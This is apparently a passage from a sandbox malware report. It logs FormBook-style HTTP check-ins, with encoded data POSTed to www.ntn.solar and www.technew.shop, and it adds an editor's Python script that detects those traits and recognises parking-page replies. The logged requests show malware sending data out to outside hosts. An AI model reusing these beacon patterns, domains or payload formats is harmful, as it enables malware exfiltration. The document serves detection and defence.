Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 52 66 68 4a 75 59 68 6f 31 2b 45 77 38 67 72 74 68 74 47 70 30 62 65 65 43 32 73 42 4b 51 6d 46 46 66 41 44 4f 65 51 7a 71 33 6d 2b 6f 64 2b 2f 67 32 4f 7a 4a 79 4b 53 79 30 33 5a 47 6f 75 6f 51 4b 51 66 6f 2b 76 45 51 41 52 4f 53 76 6c 4c 2f 39 6d 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:04:09.858278990 CEST | 506 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODhiNzU3MmMtNmY1OS00MDBjLWEzZTQtZGMzNTJmNmUwOTlmIiwicGFnZV90aW1lIjoxNzI4NDcxODQ5LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


Session ID: 26 | Source IP: 192.168.11.30 | Source Port: 49847 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:12.385987997 CEST | 618 | OUT | POST /udtr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.ntn.solar
Cache-Control: max-age=0
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.ntn.solar
Referer: http://www.ntn.solar/udtr/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 45 55 35 69 50 58 6e 39 53 4b 37 45 56 43 6e 66 7a 52 4b 59 31 56 4c 63 61 6c 57 51 69 6e 39 2f 66 70 2b 76 61 7a 63 66 6f 37 42 68 4b 42 62 31 30 49 50 46 31 52 46 65 6d 77 6b 48 62 59 70 6c 49 65 39 45 52 42 73 4f 49 48 6e 67 65 32 6d 58 4b 73 56 52 68 38 5a 72 34 79 43 34 59 34 34 42 2b 48 79 69 31 4a 48 41 56 48 35 2f 77 4e 30 61 6e 74 67 72 75 2b 32 58 43 6d 31 50 55 59 77 79 44 36 30 2b 74 30 48 55 4f 39 70 71 54 59 37 33 55 47 6d 4f 33 43 44 7a 2f 4d 74 34 78 6a 50 44 50 36 4a 41 45 32 71 58 31 4c 45 58 53 71 4b 4f 35 72 50 47 6b 53 49 71 43 72 72 64 45 64 35 2f 44 5a 67 30 38 74 34 2b 4c 35 64 52 6d 4c 45 35 35 46 79 5a 74 32 4d 3d
Data Ascii: nhl=EU5iPXn9SK7EVCnfzRKY1VLcalWQin9/fp+vazcfo7BhKBb10IPF1RFemwkHbYplIe9ERBsOIHnge2mXKsVRh8Zr4yC4Y44B+Hyi1JHAVH5/wN0antgru+2XCm1PUYwyD60+t0HUO9pqTY73UGmO3CDz/Mt4xjPDP6JAE2qX1LEXSqKO5rPGkSIqCrrdEd5/DZg08t4+L5dRmLE55FyZt2M=
Oct 9, 2024 13:04:12.487884045 CEST | 1289 | IN | HTTP/1.1 200 OK
date: Wed, 09 Oct 2024 11:04:12 GMT
content-type: text/html; charset=utf-8
content-length: 1106
x-request-id: 2cab0d69-95de-447f-902d-0119051a42cd
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
set-cookie: parking_session=2cab0d69-95de-447f-902d-0119051a42cd; expires=Wed, 09 Oct 2024 11:19:12 GMT; path=/
connection: close
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 52 66 68 4a 75 59 68 6f 31 2b 45 77 38 67 72 74 68 74 47 70 30 62 65 65 43 32 73 42 4b 51 6d 46 46 66 41 44 4f 65 51 7a 71 33 6d 2b 6f 64 2b 2f 67 32 4f 7a 4a 79 4b 53 79 30 33 5a 47 6f 75 6f 51 4b 51 66 6f 2b 76 45 51 41 52 4f 53 76 6c 4c 2f 39 6d 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:04:12.487898111 CEST | 506 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMmNhYjBkNjktOTVkZS00NDdmLTkwMmQtMDExOTA1MWE0MmNkIiwicGFnZV90aW1lIjoxNzI4NDcxODUyLCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


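Added example, not part of the Joe Sandbox report: a small Python check that parses captured requests and responses in the shape shown in the sessions above and flags the FormBook check-in pattern visible there (a short form key such as "nhl" carrying an unescaped base64 blob, Origin and Referer set to the contacted host and exact path, the legacy Opera Mobile User-Agent, Connection: close, and a short directory-style path). It also fingerprints the domain-parking replies that www.ntn.solar returned ("parking_session" cookie, "x-adblock-key" header, "window.park"), which is the caveat worth keeping in mind when reading this report: a 200 OK does not make the host a live C2. FormBook is known to contact decoy domains alongside its real one, so the domains here are candidate indicators, not confirmed infrastructure. The FormBook POST, the GET and the parking reply below are copied from the sessions above with headers trimmed to those the check uses and the parking page body shortened; the login request is a constructed benign control; the 32-character minimum blob length and the three-indicator cut-off are assumptions.

```python
"""Flag FormBook-style HTTP check-ins in captured request/response text.

Example added by the editor; not part of the Joe Sandbox report. The indicators
come from the sessions captured above; the numeric thresholds are assumptions.
"""
import base64
import re

# Samples: the POST, GET and parking reply are copied from the captured sessions
# (headers trimmed, parking page body shortened); the login POST is constructed.
FORMBOOK_POST = """\
POST /udtr/ HTTP/1.1
Host: www.ntn.solar
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.ntn.solar
Referer: http://www.ntn.solar/udtr/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1

nhl=EU5iPXn9SK7EVi7fx2eYklLbDlWQoH97fpCvayYPoJVhKkn17q3F0RFepQkGGopsIeAnREsOIHzgezaXK/tWn8YNwSC+SY4B+Hyi1JDmVHx/z8EamPYq1e2QS21PQYwMD60ct1b+O/hqTaj3UXmJkiD9i8sy0S3TBa5JD0CHsu8ZX97Uko7E3y0HeqG1Gf4keQ=="""

FORMBOOK_GET = """\
GET /sfkd/?9X=EvKH2xeP-DpP307P&nhl=6fNbEIWWB2JJYS/xey3WpvKJAvyVMhdKAAm+d4mFCTcNv85JxXzT3vI5ksH8d7X+fFM95ZwnL4Rg7OKzcd6ey2l8BalYo4zWdRdc8Csjk88M/vg6xuj19U8= HTTP/1.1
Host: www.mybartendinglife.club
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1"""

PARKING_REPLY = """\
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
set-cookie: parking_session=88b7572c-6f59-400c-a3e4-dc352f6e099f; expires=Wed, 09 Oct 2024 11:19:09 GMT; path=/
connection: close

<!doctype html><html><body><div id="target"></div><script>window.park = "(shortened)"</script></body></html>"""

BENIGN_POST = """\
POST /api/login HTTP/1.1
Host: app.example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://app.example.com
Referer: https://app.example.com/login
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/129.0.0.0 Safari/537.36
Connection: keep-alive

username=alice&password=hunter2"""

B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")
# User-Agent string sent in every request of the sessions above.
LEGACY_UA_RE = re.compile(r"Opera/9\.80 \(S60; SymbOS; Opera Mobi")


def parse_http(text: str) -> dict:
    """Split one captured request or response into start line, headers and body."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"start": lines[0].split(" ", 2), "headers": headers, "body": body.strip()}


def _form_pairs(encoded: str) -> list:
    # Not urllib.parse.parse_qs on purpose: FormBook sends its base64 unescaped,
    # and parse_qs would turn every '+' into a space before we could check it.
    return [tuple(p.partition("=")[::2]) for p in encoded.split("&") if p]


def _is_b64_blob(value: str, min_len: int = 32) -> bool:
    """Padded standard-alphabet base64 of at least min_len chars (assumed threshold)."""
    if len(value) < min_len or len(value) % 4 or not B64_RE.fullmatch(value):
        return False
    try:
        base64.b64decode(value, validate=True)
    except ValueError:
        return False
    return True


def formbook_indicators(req: dict) -> list:
    """Return the names of the FormBook check-in traits present in one request."""
    method, target = (req["start"] + ["", ""])[:2]
    h = req["headers"]
    host = h.get("host", "")
    path, _, query = target.partition("?")
    hits = []
    if LEGACY_UA_RE.search(h.get("user-agent", "")):
        hits.append("legacy-opera-mobile-ua")
    if h.get("connection", "").lower() == "close":
        hits.append("connection-close")
    origin = h.get("origin", "")
    # Origin is the contacted host and Referer is the exact URL being posted to:
    # the bot pretends to have been "on" the page it submits to.
    if host and origin in (f"http://{host}", f"https://{host}") and h.get("referer") == origin + path:
        hits.append("self-referencing-origin-referer")
    if re.fullmatch(r"/[A-Za-z0-9]{2,8}/", path):
        hits.append("short-directory-path")
    payload = req["body"] if method == "POST" else query
    if any(len(k) <= 3 and _is_b64_blob(v) for k, v in _form_pairs(payload)):
        hits.append("short-key-base64-blob")
    return hits


def is_formbook_checkin(text: str, threshold: int = 3) -> bool:
    """Assumed cut-off: three or more traits together count as a hit."""
    return len(formbook_indicators(parse_http(text))) >= threshold


def is_parked_response(text: str) -> bool:
    """Fingerprint of the domain-parking page www.ntn.solar returned above."""
    resp = parse_http(text)
    h = resp["headers"]
    return (h.get("set-cookie", "").startswith("parking_session=")
            or "x-adblock-key" in h or "window.park" in resp["body"])


if __name__ == "__main__":
    for label, sample in (("formbook POST", FORMBOOK_POST), ("formbook GET", FORMBOOK_GET),
                          ("benign POST", BENIGN_POST)):
        print(f"{label}: {formbook_indicators(parse_http(sample))}")
    print(f"ntn.solar reply is a parking page: {is_parked_response(PARKING_REPLY)}")
```

Run against a proxy or IDS HTTP log, the request-side checks give a high-confidence hit only when several traits coincide; any one of them alone (Connection: close, a base64 form value) is common in benign traffic. The response-side check is the triage aid: a parked reply means the domain can be deprioritised as a takedown or blocking target even though the sample did contact it.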
Session ID: 27 | Source IP: 192.168.11.30 | Source Port: 49848 | Destination IP: 199.59.243.227 | Destination Port: 80 | PID: 6156 | Process: C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:15.011703968 CEST | 1289 | OUT | POST /udtr/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.ntn.solar
Cache-Control: max-age=0
Content-Length: 3336
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.ntn.solar
Referer: http://www.ntn.solar/udtr/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Data Raw: 6e 68 6c 3d 45 55 35 69 50 58 6e 39 53 4b 37 45 56 43 6e 66 7a 52 4b 59 31 56 4c 63 61 6c 57 51 69 6e 39 2f 66 70 2b 76 61 7a 63 66 6f 37 5a 68 4b 54 6a 31 37 4a 50 46 79 52 46 65 72 51 6b 43 62 59 6f 6c 49 61 51 4e 52 42 52 73 49 45 66 67 65 55 65 58 62 4e 56 52 30 4d 5a 72 6e 43 43 35 53 59 34 55 2b 48 6a 6c 31 4a 58 41 56 48 35 2f 77 4f 63 61 75 66 59 72 70 4f 32 51 53 32 31 49 51 59 77 4a 44 35 45 45 74 30 44 75 4f 37 31 71 54 72 44 33 56 30 4f 4f 33 43 44 7a 79 73 74 35 78 69 7a 58 50 36 52 71 45 31 36 70 31 62 6f 58 51 65 2f 33 68 5a 6e 35 2b 46 77 70 47 50 58 45 49 72 52 76 45 49 77 51 74 38 49 33 43 34 64 2b 2f 4f 34 65 70 57 47 63 2f 69 6f 45 74 52 6b 45 54 55 64 31 50 53 74 4a 45 6e 78 74 58 49 6b 6d 41 33 65 34 6e 50 73 4d 58 79 6f 6d 68 50 70 4a 4f 75 4e 56 41 32 4d 71 58 31 31 45 6d 45 33 46 39 42 49 30 4b 56 59 70 2b 71 72 4d 76 51 74 51 47 69 58 66 69 66 33 79 51 48 7a 4d 30 78 58 76 76 42 51 42 4d 59 6b 6d 58 4b 63 46 6e 4f 6f 6e 64 77 49 51 50 56 54 73 38 4a 6d 53 41 77 44 6f 49 34 [TRUNCATED]
Data Ascii: nhl=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
Oct 9, 2024 13:04:15.011753082 CEST | 2446 | OUT | Data Raw: 74 45 57 6c 2b 4f 55 55 55 37 70 4c 71 6b 35 39 5a 35 77 30 6c 65 6a 64 34 5a 72 73 33 58 65 41 42 35 45 4c 54 42 55 30 4c 54 71 33 47 44 7a 6a 35 69 4c 34 75 46 65 78 57 57 2f 4f 46 66 68 64 56 50 31 65 4f 79 4a 7a 6a 79 6a 53 61 52 42 67 79 50
                                                                                                                                                                Data Ascii: tEWl+OUUU7pLqk59Z5w0lejd4Zrs3XeAB5ELTBU0LTq3GDzj5iL4uFexWW/OFfhdVP1eOyJzjyjSaRBgyPkKpdZrSKE6cDv7OFg+GFYLo6f2y3+mAu94XZY76E0uioDoOT/9vGtebGK8T/NfENXOgoELm+O+099vmpAIZ8h+VTpgIJPbPFnUkHjH/Im/rx9CK2boW7s2HLKFilATUYSXVzTqcfhWNSONkr9ge8UbL9iB3nTcbsZ
                                                                                                                                                                Oct 9, 2024 13:04:15.114428043 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                date: Wed, 09 Oct 2024 11:04:14 GMT
                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                content-length: 1106
                                                                                                                                                                x-request-id: ec9e46ab-4c6c-4c07-94fa-5f69a6ba37b2
                                                                                                                                                                cache-control: no-store, max-age=0
                                                                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==
                                                                                                                                                                set-cookie: parking_session=ec9e46ab-4c6c-4c07-94fa-5f69a6ba37b2; expires=Wed, 09 Oct 2024 11:19:15 GMT; path=/
                                                                                                                                                                connection: close
                                                                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 52 66 68 4a 75 59 68 6f 31 2b 45 77 38 67 72 74 68 74 47 70 30 62 65 65 43 32 73 42 4b 51 6d 46 46 66 41 44 4f 65 51 7a 71 33 6d 2b 6f 64 2b 2f 67 32 4f 7a 4a 79 4b 53 79 30 33 5a 47 6f 75 6f 51 4b 51 66 6f 2b 76 45 51 41 52 4f 53 76 6c 4c 2f 39 6d 70 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fRfhJuYho1+Ew8grthtGp0beeC2sBKQmFFfADOeQzq3m+od+/g2OzJyKSy03ZGouoQKQfo+vEQAROSvlL/9mpQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                Oct 9, 2024 13:04:15.114444017 CEST506INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZWM5ZTQ2YWItNGM2Yy00YzA3LTk0ZmEtNWY2OWE2YmEzN2IyIiwicGFnZV90aW1lIjoxNzI4NDcxODU1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.30 | 49849 | 199.59.243.227 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:17.648009062 CEST | 343 | OUT | GET /udtr/?nhl=JWRCMib9Ab6yKGK9tVnY1k7oTlzf3FlCZv+JaD8ekJd2eSGus8uX9j1aomNbYcA4VfgdKRJwSCfsWTeuLYlP9NwC5xq+bIEo1S2z3eaxb1ZDoYcdhdFludY=&9X=EvKH2xeP-DpP307P HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Host: www.ntn.solar
Connection: close
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
Oct 9, 2024 13:04:17.749865055 CEST | 1289 | IN | HTTP/1.1 200 OK
date: Wed, 09 Oct 2024 11:04:17 GMT
content-type: text/html; charset=utf-8
content-length: 1454
x-request-id: 6ec0d6ff-1398-495e-9d44-9f8b7ad5b9a8
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Kw/cRBXebokJ2W1hVr8bre7lHC3YKAGE5V2ZqOoUcm+avtpasHjyqm7HKbbFE++hLaXeJFOhNrXwnQPl1bgR8A==
set-cookie: parking_session=6ec0d6ff-1398-495e-9d44-9f8b7ad5b9a8; expires=Wed, 09 Oct 2024 11:19:17 GMT; path=/
connection: close
Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4b 77 2f 63 52 42 58 65 62 6f 6b 4a 32 57 31 68 56 72 38 62 72 65 37 6c 48 43 33 59 4b 41 47 45 35 56 32 5a 71 4f 6f 55 63 6d 2b 61 76 74 70 61 73 48 6a 79 71 6d 37 48 4b 62 62 46 45 2b 2b 68 4c 61 58 65 4a 46 4f 68 4e 72 58 77 6e 51 50 6c 31 62 67 52 38 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Kw/cRBXebokJ2W1hVr8bre7lHC3YKAGE5V2ZqOoUcm+avtpasHjyqm7HKbbFE++hLaXeJFOhNrXwnQPl1bgR8A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
Oct 9, 2024 13:04:17.749948025 CEST | 854 | IN | Data Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmVjMGQ2ZmYtMTM5OC00OTVlLTlkNDQtOWY4YjdhZDViOWE4IiwicGFnZV90aW1lIjoxNzI4NDcxODU3LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cubnRuLnNvbGFyL3VkdHI


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.30 | 49850 | 45.56.219.238 | 80 | 6156 | C:\Program Files (x86)\MGvNXdFMRgmwCGLFFGVRdmtvlfIBdBIASMDzMzvqfNweoHyYVzlRonhskxe\SjhnWvlTMw.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 13:04:23.238399029 CEST | 607 | OUT | POST /n2yx/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.technew.shop
Cache-Control: max-age=0
Content-Length: 200
Content-Type: application/x-www-form-urlencoded
Connection: close
Origin: http://www.technew.shop
Referer: http://www.technew.shop/n2yx/
User-Agent: Opera/9.80 (S60; SymbOS; Opera Mobi/1209; U; fr) Presto/2.5.28 Version/10.1
